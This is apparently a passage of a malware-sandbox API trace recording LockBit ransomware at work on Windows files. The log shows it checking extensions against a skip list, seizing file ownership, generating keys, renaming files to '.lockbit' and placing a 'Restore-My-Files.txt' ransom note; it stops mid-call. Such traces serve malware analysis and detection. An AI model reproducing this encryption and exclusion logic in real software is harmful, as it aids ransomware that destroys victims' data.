[0082.576] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.576] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.576] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.576] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.576] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.577] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.577] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.577] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.577] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.577] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.577] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.577] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.578] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.578] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.578] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.578] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NextMenuButtonIcon.png") returned 1 [0082.578] lstrcmpiW (lpString1="ntldr", lpString2="NextMenuButtonIcon.png") returned 1 [0082.578] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NextMenuButtonIcon.png") returned 1 [0082.578] lstrcmpiW (lpString1="bootsect.bak", lpString2="NextMenuButtonIcon.png") returned -1 [0082.578] lstrcmpiW (lpString1="autorun.inf", lpString2="NextMenuButtonIcon.png") returned -1 [0082.578] lstrcmpiW (lpString1="thumbs.db", lpString2="NextMenuButtonIcon.png") returned 1 [0082.578] lstrcmpiW (lpString1="iconcache.db", lpString2="NextMenuButtonIcon.png") returned -1 [0082.579] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.579] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png") returned=".png" [0082.579] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.579] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.579] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.579] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.580] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.580] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.580] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.580] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.580] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.580] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.580] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.580] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.580] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.580] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.580] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png.lockbit") returned 87 [0082.580] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.581] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.581] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.581] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.581] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.581] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.582] RtlFreeAnsiString (AnsiString="\\") [0082.582] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0082.582] malloc (_Size=0x200) returned 0x77d800 [0082.582] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.582] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.582] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.582] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.582] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.583] CloseHandle (hObject=0x3bc) returned 1 [0082.583] free (_Block=0x77d800) [0082.583] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.583] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.583] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.585] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4456) returned 1 [0082.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.586] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.591] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.591] malloc (_Size=0xc4) returned 0x77d800 [0082.591] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0082.592] free (_Block=0x77d800) [0082.592] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.592] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.592] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.592] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dbda349, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc04, dwReserved0=0x0, dwReserved1=0x0, cFileName="NextMenuButtonIconSubpictur.png", cAlternateFileName="")) returned 1 [0082.592] lstrcmpiW (lpString1=".", lpString2="NextMenuButtonIconSubpictur.png") returned -1 [0082.592] lstrcmpiW (lpString1="..", lpString2="NextMenuButtonIconSubpictur.png") returned -1 [0082.592] PathFindExtensionW (pszPath="NextMenuButtonIconSubpictur.png") returned=".png" [0082.592] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.593] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.593] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.593] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.593] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.593] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.594] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.594] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.594] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.594] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.594] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.594] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.594] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.594] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NextMenuButtonIconSubpictur.png") returned 1 [0082.594] lstrcmpiW (lpString1="ntldr", lpString2="NextMenuButtonIconSubpictur.png") returned 1 [0082.594] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NextMenuButtonIconSubpictur.png") returned 1 [0082.594] lstrcmpiW (lpString1="bootsect.bak", lpString2="NextMenuButtonIconSubpictur.png") returned -1 [0082.594] lstrcmpiW (lpString1="autorun.inf", lpString2="NextMenuButtonIconSubpictur.png") returned -1 [0082.594] lstrcmpiW (lpString1="thumbs.db", lpString2="NextMenuButtonIconSubpictur.png") returned 1 [0082.594] lstrcmpiW (lpString1="iconcache.db", lpString2="NextMenuButtonIconSubpictur.png") returned -1 [0082.595] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.595] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png") returned=".png" [0082.595] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.595] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.595] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.595] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.595] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.595] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.595] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.595] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.596] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.596] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.596] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.596] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png.lockbit") returned 96 [0082.596] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.596] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.597] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.597] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.597] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.597] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.597] RtlFreeAnsiString (AnsiString="\\") [0082.597] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.597] malloc (_Size=0x200) returned 0x77d800 [0082.597] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.597] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.597] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.597] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.598] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.598] CloseHandle (hObject=0x3c4) returned 1 [0082.598] free (_Block=0x77d800) [0082.598] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.598] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.598] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.599] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3076) returned 1 [0082.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.600] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.628] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.628] malloc (_Size=0xd6) returned 0x77d800 [0082.628] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd6, FileInformationClass=0xa) returned 0xc0000008 [0082.628] free (_Block=0x77d800) [0082.628] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.628] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.628] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.628] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70184844, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70184844, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc26605, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa942c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_loop.wmv", cAlternateFileName="")) returned 1 [0082.628] lstrcmpiW (lpString1=".", lpString2="Notes_loop.wmv") returned -1 [0082.628] lstrcmpiW (lpString1="..", lpString2="Notes_loop.wmv") returned -1 [0082.628] PathFindExtensionW (pszPath="Notes_loop.wmv") returned=".wmv" [0082.628] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0082.628] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0082.628] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0082.628] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0082.628] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0082.628] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0082.628] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0082.628] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0082.629] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0082.629] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW 